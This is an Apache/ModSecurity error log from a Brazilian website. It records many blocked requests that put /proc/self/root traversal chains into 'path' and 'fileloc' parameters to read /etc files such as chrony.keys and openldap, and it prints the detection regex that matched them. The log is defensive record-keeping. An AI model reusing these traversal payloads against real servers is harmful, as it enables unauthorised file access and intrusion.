[Fri Mar 20 12:06:34.061388 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.241.31:53168] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iegF0L0L-SsrnPo6d8AAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:06:35.419266 2026] [:error] [pid 11642:tid 140411683178240] [client 74.7.241.31:53182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ie7ninkcc-iUj5AqRhAAAA4c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:06:41.165868 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.241.31:53184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1igV1pVZ5mVmJwsFNjMAAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:07:17.614690 2026] [:error] [pid 7235:tid 140411683178240] [client 57.141.18.56:49312] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1ipfqxLDW4GITHUkQgQAAAAQc"]
[Fri Mar 20 12:07:20.387046 2026] [:error] [pid 15826:tid 140411674785536] [client 57.141.18.82:49376] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1iqOoXxyEfFpUF8f-1PgAAAUg"]
[Fri Mar 20 12:07:28.928840 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:33774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1isPqxLDW4GITHUkQgWgAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:07:35.699715 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.243.128:34410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1it_qxLDW4GITHUkQgbAAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:07:37.337422 2026] [mime_magic:error] [pid 7235:tid 140411540502272] (70014)End of file found: [client 57.141.18.117:49854] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:07:39.978346 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.241.31:50260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iu_qxLDW4GITHUkQgcQAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:07:41.379565 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:55766] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ivda6ubjKNq_cu4YSlAAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:07:42.779705 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:34426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ivta6ubjKNq_cu4YSlgAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:07:45.550232 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:55772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iweoXxyEfFpUF8f-1RwAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:07:47.951388 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.241.31:55774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iw_qxLDW4GITHUkQgdgAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:07:49.350821 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.241.31:51812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ixbninkcc-iUj5AqRnwAAA5A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:07:50.659170 2026] [:error] [pid 11642:tid 140411565680384] [client 74.7.241.31:51826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ixrninkcc-iUj5AqRoQAAA5U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:07:51.938952 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:51836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ix-oXxyEfFpUF8f-1SgAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:07:53.355406 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:51842] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iyda6ubjKNq_cu4YSmwAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:07:54.651180 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.241.31:51858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iyvqxLDW4GITHUkQgfAAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:07:56.015429 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:51874] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1izNa6ubjKNq_cu4YSngAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:07:58.427235 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.241.31:36246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1izvXLqtnMIWvjpaLSRgAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:07:59.742913 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:36256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iz-oXxyEfFpUF8f-1TwAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:03.430932 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.241.31:36260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i0_XLqtnMIWvjpaLSUwAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:08:04.692136 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.241.31:36264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1i1DJ3M9BSuKP7CAZerwAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
